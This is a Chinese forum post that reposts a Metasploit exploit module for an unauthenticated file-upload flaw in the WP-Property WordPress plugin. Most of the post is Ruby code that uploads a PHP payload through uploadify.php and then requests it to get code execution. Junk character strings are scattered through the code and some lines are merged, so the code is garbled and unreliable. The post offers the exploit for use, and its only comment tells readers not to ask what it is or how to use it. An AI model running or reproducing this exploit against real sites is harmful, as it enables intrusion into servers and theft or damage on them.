WordPress WP-Property PHP 文件上传漏洞
* S" C. ?: M4 e2 J( C# D+ A- U% ?; F K9 ?9 g! I% H3 ?2 d& t
## # This file is part of the Metasploit Framework and may be subject to! U6 a$ }9 b& o( h* W+ N% `
# x9 ?9 H* F/ R+ d
# redistribution and commercial restrictions. Please see the Metasploit) r t1 o) |$ K% {3 s
5 q% _# Q* O- @: x
# Framework web site for more information on licensing and terms of use.
0 U6 w5 h( \0 {: H8 k. M* {& K( ?) P) q2 }' t! k9 t; l
# http://metasploit.com/framework/ ##
; }: @+ t* C# }! A% C& G8 f+ J9 F
" ?& P" d) g0 F ( b; m) H8 z. b2 c
" H. s& _% {2 e+ ~ X
# ~7 R" a# h1 W! k$ L+ w: d4 S
$ \$ E. {' T4 L" J
require 'msf/core'
4 A1 I) ]3 O1 J- Q$ {" k2 ?% I/ Nrequire 'msf/core/exploit/php_exe'2 R+ ]9 p7 V1 Q: M3 X
) i' R5 J2 _6 ]4 \9 f' iclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
( d: P. e) X2 a& @'Description' => %q{
! a8 L0 J/ X0 k" r6 l4 @9 XThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>+ d( e/ X8 M1 n k7 p; O! i
[* d' _6 |. @3 {( _
'Sammy FORGIT', # initial discovery+ k3 M% E4 P6 O7 t, N. c
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
) v- A- ~ r7 b9 h# A],
8 T8 v" L- |" L! u) }: l1 i'License' => MSF_LICENSE,+ y- j, u9 |% N4 C& v2 Y7 q# o
'References' =>
! `- Y! y* s3 U[
* D+ A+ R# `4 i" ~: ?- g( R% W[ 'OSVDB', '82656' ],
8 R" m( x* b0 }7 S$ I: G! A[ 'BID', '53787' ],
3 E8 v# h9 i' n. F[ 'EDB', '18987'],
2 H* A9 x1 n m# J; m3 e. l; [[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]; G9 K# }' C p2 O% b
],4 t% }# b; ~1 B# ^
'Payload' =>
. t7 A l% j2 r! E% |{3 `$ }" L5 g3 y+ [( m; L+ \3 j
'BadChars' => "\x00",
' P* Y5 s: b. |% z) @! O},
* n& z! `% T. H* i9 r'Platform' => 'php',4 S/ W; l3 G. r7 O( E
'Arch' => ARCH_PHP,
" a/ X' l8 s4 B( `$ R2 k/ s% n'Targets' =>
6 }: t' }1 B0 ?[! L; ?6 ~: O+ n4 W x
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
( b# a8 S, h3 w* o* r$ U. u[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
& | V2 Y% E. Y$ p" P6 E7 @. J8 r],
& a* s" x" l& W. p'DefaultTarget' => 0,
& o) k# i: W" a'DisclosureDate' => 'Mar 26 2012'))' r' T; w# O5 m6 C/ D9 Z
9 _# j/ l3 f0 h" H1 ^4 k6 N
register_options(! I8 t0 o: ~+ X4 o) k' I; ^2 F! ^
[8 s5 C6 o6 h6 v. y
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
5 M) V f) E( X- U" Z& n {], self.class)4 `/ N) H4 J0 x
end
9 y( L0 e0 {3 q: {0 J6 e) v e
, o6 }+ d# @$ Xdef check8 L( W* t0 T; y1 j" S& ^
uri = target_uri.path
0 G- N3 Q7 v' |( q* V Y# }! Furi << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
' p/ h2 j/ K$ a/ q8 R: ?'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
6 {& R: ~, }3 O: p5 s})
3 D: b. i1 z1 P: v1 o) t7 c. \: ?, s0 n+ M5 g" x4 }8 p; @
if not res or res.code != 2003 _' e- E- @" b3 U" q- k7 ^9 R
return Exploit::CheckCode::Unknown3 H$ |* O0 P% x2 o( g8 E. F5 l6 q
end! t/ P. I1 J& K* o
0 [/ D$ E# |' ^9 {6 U; n
return Exploit::CheckCode::Appears9 i2 T' e/ l6 R9 d; x
end
e: @7 P9 Q# K7 B; T! t# u7 ]# v+ D" F& b' F5 C, q; z
def exploit
% u: o& g. Z, n( W; auri = target_uri.path" a5 I, r3 u9 x" ^
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) t( c4 U) k# j
) }( h7 o7 u! {! C( P7 ^
data = Rex::MIME::Message.new5 |2 M: A _, A* i
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
4 u9 h2 v, W) ^/ z0 G0 z/ F3 ldata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")) ^. D( R: R2 v2 E- W
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 E) w- h! H3 f5 v w, n
" ?2 T& {) v z( ^. d0 \print_status("#{peer} - Uploading payload #{@payload_name}"), M9 g8 \- k) l2 o: k( u6 W& a
res = send_request_cgi({
' d5 D7 I" _ [% t3 a' H'method' => 'POST',
9 n& S" j* u2 W0 ]. n'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
_1 z/ K* C/ {'ctype' => "multipart/form-data; boundary=#{data.bound}",
4 b! ~: f* f0 z, i# I# m8 g) x'data' => post_data# \% L% G W. [* Z( {/ S
})4 H0 L6 \# Q3 P4 R) Q
- ^& A8 _% B" j/ }
if not res or res.code != 200 or res.body !~ /#{@payload_name}/+ f7 @# x" l$ ^* N+ V
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
: ~; o8 Q5 g# t7 l* Bend
; s) i G- D. `: `- } x6 x
. `* @7 E/ o4 t$ q s7 B* wupload_uri = res.body& z. M* R* s6 z% ?. X( ?. ?
7 O6 T9 {% {6 R) C# u
print_status("#{peer} - Executing payload #{@payload_name}")" `6 v9 {1 x; [- j6 n
res = send_request_raw({% g& f/ n" u0 B0 L# O, L: T
'uri' => upload_uri,9 |9 {5 k: @( e6 H2 q
'method' => 'GET'
! w6 S# a- W6 k# r8 d0 ~})
+ E. ^" i& r3 s% yend
$ g. b7 t, z' w: S. send
+ |6 T( X% T* }) g- H9 \( ~; n9 k0 u" _4 g5 c0 f: Q( r
不要问我这写的是什么 怎么利用 我是说msf.; L4 `! a8 R8 Z
% P4 _; p& H7 C! [! ^
|
发表于 2013-1-4 19:51:30
收藏
支持
反对